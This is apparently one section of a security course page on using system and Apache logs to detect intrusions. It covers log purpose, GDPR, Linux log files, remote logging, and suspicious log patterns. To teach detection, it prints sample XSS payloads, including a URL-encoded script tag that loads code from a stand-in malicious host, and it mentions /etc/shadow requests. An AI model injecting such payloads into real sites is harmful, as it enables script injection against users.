This part discusses about how we can notice that something is going on in the system we are administrating. After this we are moving towards the intrusion tolerant architectures.

Your system is the target

You can try and then try some more but it is impossible to protect your network against every kind of attack. It would be nice to know if something fishy is happening or in the worst case if the system is already breached that you would have data that can be used to identify the cause of it. Well, how to achieve this. One word, LOGS. They contain the digital trail of what happens in your system.

Purpose of logs

According to OWASP the log always contains four basic types of information: when, where, who, and what and security events should always be included. So logs are files that contain information of all activities that happen in the system. The timestamped entries can be considered as fingerprint of what happened. Which can be used to reconstruct the breach. One should be able to figure out what happened and in what order. Mining logs is a vital method of doing forensics analysis. Managing the logs has to be done properly in such a manner that the intruder shouldn’t be able to modify them. Properly managed logs can also be used as evidence in prosecution.

In addition, to the obvious reasons such as identifying security incidents, or assisting non-repudiation controls, logs are vital source of information to establishing the baseline behaviour for the day-to-day business and with that baseline it is easier to use techniques such as anomaly detection to be warned when something out of the ordinary is going on. For example if something is about to break.

Managing Logs

For all of the system it is not necessary to keep everything. Instead one could categorize parts of the systems into groups based on their vitality to the system (the architecture analysis, which was discussed earlier, can be used as a guide of figuring out what parts are the vital ones). Based on those groups one can then decide how much information is stored on the actions. This is a balancing act between the storage and the knowledge of what happened. For example if you store few short messages your log does not require large storage but then again you do not have much knowledge what actually happened. Or on the other end of the spectrum you store basically everything you need lots of storage but you know exactly what happened.

Moreover, there are other things, such as law, that the log collector has to remember. Depending on the content of what is logged from the machine you might bump into situation that you need to have a privacy policy for people to read and take extra precautions on the data integrity and storage (even storage times). For example if you log the site's usernames or emails you are actually gathering personal information which then makes the log a person register. Other example is any other data in the log about the communications that can be associated with a certain user and so identifying who did what. As a reminder, soon we are going to have even stricter regulations (General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679)) on how we have to handle the personal data.

Logging in Linux systems

Here we are going to give you a very brief introduction to logging on Linux system. For other *nix and flavors of Linux there might be some differences, such as filenames auth.log vs. auth_log, but the basics remain the same. Why Linux? Well, according to W3tech and Netcraft the Linux as OS and Apache as the web server are holding the market share of the used options for setting up a webserver to serve the clients.

Linux Log Files

A typical log directory in Linux-based systems contains many types of logs. First, there is the auth.log that contains the authentication events, such as sudos, remote logins, etc. Second, the daemon logs that log the information about the running application daemons. Third, the kernel log and the kernel ring buffer that are useful for kernel troubleshooting, Fourth, the debug log which collects the debug level information if enabled. Fifth, the system log itself that contains the greatest amount of data. It is usually the place where to look if other logs do not contain the looked for data. After this there are the application logs, out of which we will briefly introduce the Apache logs.

As an example below are couple of lines from different logs. The first is an example of auth log line and the second is an example of a system log line. They are similar in format. First the time stamp, hostname, who reported and what.

Jan 18 19:24:59 examplehost sudo: pam_unix(sudo:auth): authentication failure; logname= uid=1073634 euid=0 tty=/dev/pts/0 ruser=username rhost=  user=username
Jan 23 18:05:24 examplehost dnsmasq[1536]: using nameserver 8.8.8.8#53

Apache logs

Apache creates two logs under the /var/log/apache2/ (may vary depending on the system) and it contains an error log and an access log. The error log contains diagnostic information and any records of errors encountered. The access log contains everything else. It is highly customizable but can contain something like the following.

127.0.0.1 ­- frank [10/Oct/2007:13:55:36 ­0700] "GET /index.html HTTP/1.0" 200 2326

The first in the line is the host, followed by the identity reported by the client (here dash as it is not found) and the userid (usually the REMOTE_USER environment variables contents). After this there is the timestamp and the request line used followed by the return code and transferred object size.

Remote logging

It is not wise to store the only copies of the logs on the machine that might be hacked. It is a good idea to set up a central logging server to collect all the logs (possibly from multiple machines). This way one will have redundant copies of the logs in case they are lost or tampered with. Remote collection of logs into central server is also a good place to run analytics and identify and present security anomalies. WIth multiple machines sending their logs one must be certain that their perception of time is the same. Otherwise, interleaving what happened where and when can be difficult. One can setup a remote logging in such a way that it is secured by TLS and one could possibly send the logs via the public Internet, but it might be a better idea to send them to another machine via a dedicated control network not attached to the Internet (Although even then it should be encrypted, as it could be a mere oversight later when changing routes and suddenly the control network is accessible from the Internet. This is also one of the reason why even machines in the “inside" networks should have access control).

Analysing the log files

The logs are quite huge and can easily be over a GB. Remembering that one line is an action that has happened and it does not take that many bytes so giga byte files contain “many" events and going through them is a massive task. You can manage the task with bash, grep, cat, cut, awk, less, etc. but other purpose built tools also exist.

What to look for in a log

If you start seeing error messages of device drivers that you have not plugged in. If for example the parallel port driver starts to send error messages and there is no actual device using it. The conclusion would be that something fishy is going on.

Successful user logins, i.e., Accepted password, Accepted publickey, or Session opened. These keywords can be valid actions but what if you know that none of your workers are abroad and the IP addresses attached to these messages are from a far away place. Or what if you see thousands of failed attempts before these. Although, everything is working correctly when you see failed user logins, i.e. authentication failure or failed password, you should have something to slow them down like a iptables rule to drop too frequent connections from the same IP or use the script, such as authfail script to ban the IP for some period of time.

Changes on the user are also a point of interest. Things, such as user account additions, changes or deletions, and password changes, are really interesting along with failed sudo commands (FAILED su).

As last but not least when something starts sending failures. It is usually something that should be checked out. It could be a faulty device, a bug, or someone trying to figure out if there is a whole in the system.

So you have the logs for the web server and you are wondering what you should be looking from it. Below is a small list of points where you can start (the list is not complete but can be used to start to look for something going wrong).

For example, in the request line one could see something like the following that could result in XSS attack.

’\"--></style></script><script>MALICIOUS CODE</script>

Or you could be seeing strings with many urlencoded characters when you are not supposed to see them. For example the following might be something you do not want to see.

%3cscript%20src=%22http%3a%2f%2fwww.malicious.com%2fcode.js%22%3e%3c%2fscript%3e

If you see an error code 404 it is actually a good thing as the server just said “I did not find the file askedi". But then again if you start having loads of 404 codes it could mean that someone is searching for something that they should not be looking. On the other hand the success message 200 OK can be much more than an OK. Especially if when 200 OK is a result of, for example, either of the previous. 302 Redirect messages can be a sign that something has happened that should not have happened.

File paths and extensions is also something that one should look. Executable files are something that you might not want to see in the logs. Moreover, system paths, such as /var/log or /etc/shadow are not a good thing if found from web server’s log on a Linux box. It is also wise to remove backup and old files from the production site (.bak .old) as they are good source to look for changes in the system and they could reveal that the developer is lazy and makes mistakes etc.

During this second part of the advanced topics course, we have taken the steps into understanding system and application logging and how it can be used for intrusion detection. We also briefly glanced about the future with machine learning. This is can be considered as intrusion detection and the next part will look into intrusion tolerant architectures.

Table of contents

Some parts of this page might not work on your current browser. Consider switching to either Chrome or Firefox. Got it!